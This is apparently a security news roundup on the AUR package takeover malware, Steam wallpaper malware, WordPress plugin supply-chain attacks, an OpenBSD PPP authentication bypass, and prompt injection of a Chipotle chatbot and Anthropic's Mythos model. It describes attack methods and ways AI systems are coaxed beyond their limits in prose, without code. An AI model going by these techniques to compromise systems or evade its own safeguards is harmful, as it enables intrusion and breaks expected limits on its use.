Starting on June 11, 2026, the Arch User Repository (AUR) was targeted by malware which rapidly compromised over 1,500 packages. The AUR repository allows for abandoned community packages to be taken over by a new maintainer, which was exploited by the attackers to claim ownership.

Once the packages were adopted by the malicious maintainers, the next part should sound familiar: The package build scripts, which are executed by the Arch yay and paru package managers, were modified to install malicious NPM packages (atomic-lockfile and js-digest) each containing the now-usual suite of infostealer malware targeting browser credentials and tokens, SSH private keys, package repository tokens, cloud compute, AI tokens, and crypto wallets.

The malware once installed uses several tricks to cloak itself by renaming processes, and to install systemd services to restart itself, and leveraging eBPF filtering in the kernel to hide the sockets and processes further. It specifically targets browsers and Electron-based applications, which are basically a light-weight Chromium browser disguised as an application anyway. Slack, Discord, Signal, and many more use the Electron wrapper.

A preliminary analysis of the malware is available, which breaks down the exact behavior in more detail and lists the known targets of the malware.

Initially believed to be “only” a few hundred packages, the compromised list eventually grew to over 1500, and additional packages may still be discovered. On June 14, Phoronix reported that a second wave of compromised packages has been found in the AUR repositories, including NeoVim plugins and multiple browsers. The second set of infected packages were compromised in a similar fashion, but with more heavily obfuscated scripts.

Steam Wallpaper Malware

Kaspersky Labs finds that Steam users have been targeted by malware uploaded via a popular animated wallpaper application, “Wallpaper Engine”.

While Valve normally does an admirable job filtering the Steam store, it looks like an exploit has slipped through in “Wallpaper Engine”. Animated wallpapers can be videos, web pages, or full executables themselves. Obviously, being able to run any program masquerading as wallpaper directly is an excellent vector to install malware, so of course this is what happened.

Using the integrated Steam Workshop, which allows users to share game mods and other game content directly, malicious wallpapers install a wide variety of malware including the usual gamut of infostealers, remote access, residential proxy, key logging, and crypto miners. This makes it one of the rare times installing crypto miners almost makes sense, considering most Steam users likely have better than average video cards.

Once a user is infected, the malware also steals the current Steam login credentials, and several instances attempt to then upload additional infected wallpapers to the Steam Workshop under the compromised users identity, completing the supply chain circle of life.

WordPress Supply Chain

Sansec discovered a widespread WordPress attack which they estimate impacts 1.2 million sites using the OptinMonster, TrustPulse, and PushEngage plugins. All three plugins come from the same company, Awesome Motive, who also own other popular plugins which Sansec estimates are used in tens of millions of WP sites.

The malware is pushed directly from the Awesome Motive CDN (content delivery network) in the plugin JavaScript, and waits for an administrator to log in. Using the administrator credentials, it then creates a hidden administrator account and ships the credentials to a remote server, giving the attackers full admin access to the WordPress site. The malware attempts to evade detection by detecting headless browsers or browsers with zero-sized windows, and hides itself from the plugin list, user list, updates list, and recent activity lists.

Awesome Motive reports that they, in turn, were exploited by a vulnerability in the WordPress UpdraftPlus plugin which was then used to steal the CDN authentication and upload the compromised plugins.

This shouldn’t be confused with April 2026’s wide-spread WP attack of course, where an attacker purchased the Essential Plugins bundle from the original developers and converted all 30 plugins to Trojan versions immediately, with the first commit being a backdoor mechanism injected into the plugin. The attacker then waited eight months before triggering the backdoor payloads and began exploiting hundreds of thousands of sites.

Purchasing popular plugins has been a security problem for many years already; the browser plugin ecosystem has been victim many times to plugins being purchased by bad actors and replaced with malware via normal update mechanisms. The trick has expanded to phone and desktop applications, PyPi and NPM modules, and feels in many ways similar to the attack against the Arch AUR repository, converting trusted plugins and applications into malware vectors.

Unless marketplaces and package repositories mandate that authors provide notification, and automatically revoke updates until users manually confirm updates, purchasing a popular tool to infect it will certainly remain a successful tactic. Unfortunately, even with those safeguards, it’s likely to continue, too.

Nor should these compromised plugins be confused with the ShapedPlugin compromise impacting an additional 400,000 WordPress sites, which appears to originate from a compromise of the developing companies build and distribution process, resulting in a compromised plugin again being served directly from the official sites.

Prompt Injection as Coding Assistant

The Chipotlai-max project twists prompt injection into free coding advice. In March of 2026, Chipotle introduced a new AI chatbot service for customers who are, for some reason, interested in having a conversation with an LLM about burritos, using the Amelia LLM framework. Customers soon discovered the AI could easily be convinced to discuss more than Mexican-ish food, however, with access to the complete LLM framework including coding assistance.

This fork of the OpenCode tool plugs directly into the Chipotle API for all your taco salad coding needs. A joyfully meme-filled reminder that all that lies between a chatbot and everything the model has access to is some careful convincing.

OpenBSD PPP Vulnerable for 27 Years

The OpenBSD project has (rightly) built a long standing reputation as being a very security-oriented BSD, making almost any security flaw noteworthy. Argus Systems highlights a 27 year old flaw in the OpenBSD PPP. Yes, the dial-up IP protocol implementation present since 1999. (In other terrible news, 1999 was 27 years ago.)

The bug is only present when OpenBSD is the the authentication service for a PPP login, but allows a PPP login with no credentials. As is the case with many protocol handling bugs, the OpenBSD code makes the mistake of trusting the lengths provided by the remote device during the login; if a login request specifies an account and password length of 0, the login is successful.

The chances of this being relevant today are slim, though the code is also used in the more modern PPP over Ethernet (PPPoE) protocol found on some DSL connections.

Anthropic Mythos Inaccessible

In a monumental “why are you hitting yourself” moment that made national news, after hyping the claims of the incredible auto-hacking abilities of the Mythos model, Anthropic has been ordered by the US government to restrict access to it because of national security concerns. In what will likely be framed as “an abundance of caution”, Anthropic has removed public access entirely.

The root cause appears to be — and let us all act surprised, here — essentially prompt injection, combined of course with politics. It appears that Amazon engineers were able to convince the model to disclose “cyberattack information”, which reads like a glamorous way to say “it discussed security”. If Anthropic hadn’t been bombarding the news cycle with how dangerous Mythos was, it’s likely this would not have made national news, as most publicly available LLM models can be coaxed to assist with security research and exploit development.

It is currently unclear when the Mythos and Fable LLM models will be publicly available again, what attempts at guardrails will be required before that can happen, and if limited access will continue for partnered companies to continue the much-hyped vulnerability finding process which has made the news cycles for the past weeks.